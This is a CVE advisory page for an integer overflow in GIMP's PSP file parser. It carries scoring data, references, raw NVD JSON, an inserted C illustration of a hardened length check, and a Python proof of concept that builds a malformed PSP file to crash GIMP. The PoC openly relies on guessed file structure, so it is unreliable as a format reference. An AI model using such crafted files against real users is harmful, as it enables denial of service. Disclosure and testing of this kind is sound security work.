Security Vulnerability Report
CVE-2026-2271 CVSS 3.3 LOW

Published: 2026-03-26 21:17:05
Last Modified: 2026-04-21 15:24:47

Description

A flaw was found in GIMP's PSP (Paint Shop Pro) file parser. A remote attacker could exploit an integer overflow vulnerability in the read_creator_block() function by providing a specially crafted PSP image file. This vulnerability occurs when a 32-bit length value from the file is used for memory allocation without proper validation, leading to a heap overflow and an out-of-bounds write. Successful exploitation could result in an application level denial of service.
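The class of bug described above, shown as an added example that is not GIMP's code and not part of the original report. The function names, the `length + 1` arithmetic, the field layout and the `MAX_FIELD_LEN` cap are assumptions chosen for illustration; the point is that a file-supplied 32-bit length is checked against the bytes actually present before any allocation or copy.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_FIELD_LEN (1u << 20) /* assumed sanity cap, not a GIMP constant */

/* Unchecked pattern (assumed arithmetic): size computed in 32 bits, so a
 * file-supplied length of 0xFFFFFFFF makes length + 1 wrap to 0. */
static uint32_t unchecked_alloc_size(uint32_t length)
{
    return length + 1u; /* room for a NUL terminator; wraps at 2^32 */
}

/* Hardened reader for a hypothetical field laid out as
 * [u32 little-endian length][length bytes]. avail is the number of bytes
 * left in the enclosing block. Returns a NUL-terminated heap copy, or NULL
 * when the declared length is inconsistent with the data present. */
static char *read_field_checked(const uint8_t *buf, size_t avail)
{
    if (avail < 4)
        return NULL; /* no room for the length prefix */
    uint32_t length = (uint32_t)buf[0] | (uint32_t)buf[1] << 8 |
                      (uint32_t)buf[2] << 16 | (uint32_t)buf[3] << 24;
    if (length > MAX_FIELD_LEN || length > avail - 4)
        return NULL; /* reject before any allocation or copy */
    char *out = malloc((size_t)length + 1); /* size_t math, cannot wrap here */
    if (out == NULL)
        return NULL;
    memcpy(out, buf + 4, length);
    out[length] = '\0';
    return out;
}

int main(void)
{
    /* Constructed sample inputs, not taken from a real PSP file. */
    const uint8_t good[] = {5, 0, 0, 0, 'h', 'e', 'l', 'l', 'o'};
    const uint8_t huge[] = {0xFF, 0xFF, 0xFF, 0xFF, 'A', 'A'};
    char *s = read_field_checked(good, sizeof good);
    printf("wrapped size: %u\n", (unsigned)unchecked_alloc_size(0xFFFFFFFFu));
    printf("good: %s\n", s ? s : "(rejected)");
    printf("huge: %s\n", read_field_checked(huge, sizeof huge) ? "accepted" : "rejected");
    free(s);
    return 0;
}
```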

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gimp:gimp:3.2.0:rc2:*:*:*:*:*:* - VULNERABLE
GIMP (refer to the vendor security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct

# PoC for CVE-2026-2271: GIMP PSP Integer Overflow
# This script generates a malformed PSP file designed to trigger
# an integer overflow in the read_creator_block() function.


def create_exploit_file(filename):
    # PSP file signature (simplified for PoC)
    signature = b"Paint Shop Pro Image File\n\x0a\x00\x00\x00\x00\x1a"

    # Malicious block header
    # We aim to trigger an overflow in memory allocation calculation.
    # Assuming the parser does: size = length + header_size
    # If length is 0xFFFFFFFF, and header_size is small, size wraps around.
    block_id = 0x00  # Placeholder for creator block ID
    malicious_length = 0xFFFFFFFF  # Max 32-bit unsigned int

    with open(filename, "wb") as f:
        f.write(signature)
        # Write Block ID (Little Endian)
        f.write(struct.pack("<I", block_id))
        # Write Malicious Length (Little Endian)
        f.write(struct.pack("<I", malicious_length))
        # Note: Depending on the parser, additional padding might be required
        # to reach the vulnerable read operation.

    print(f"[+] Generated malicious file: {filename}")
    print(f"[+] Open this file in a vulnerable version of GIMP to trigger the crash.")


if __name__ == "__main__":
    create_exploit_file("crash_gimp.psp")
```

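References

https://access.redhat.com/security/cve/CVE-2026-2271
https://bugzilla.redhat.com/show_bug.cgi?id=2438429
https://gitlab.gnome.org/GNOME/gimp/-/issues/15732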

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-2271", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:04.713", "lastModified": "2026-04-21T15:24:47.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GIMP's PSP (Paint Shop Pro) file parser. A remote attacker could exploit an integer overflow vulnerability in the read_creator_block() function by providing a specially crafted PSP image file. This vulnerability occurs when a 32-bit length value from the file is used for memory allocation without proper validation, leading to a heap overflow and an out-of-bounds write. Successful exploitation could result in an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en el analizador de archivos PSP (Paint Shop Pro) de GIMP. Un atacante remoto podría explotar una vulnerabilidad de desbordamiento de entero en la función read_creator_block() al proporcionar un archivo de imagen PSP especialmente diseñado. Esta vulnerabilidad ocurre cuando un valor de longitud de 32 bits del archivo se utiliza para la asignación de memoria sin una validación adecuada, lo que lleva a un desbordamiento de montículo y una escritura fuera de límites. La explotación exitosa podría resultar en una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.2.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "2585D713-54B3-494C-99DC-53E3A7CE0CFE"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-2271", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438429", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/15732", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}
```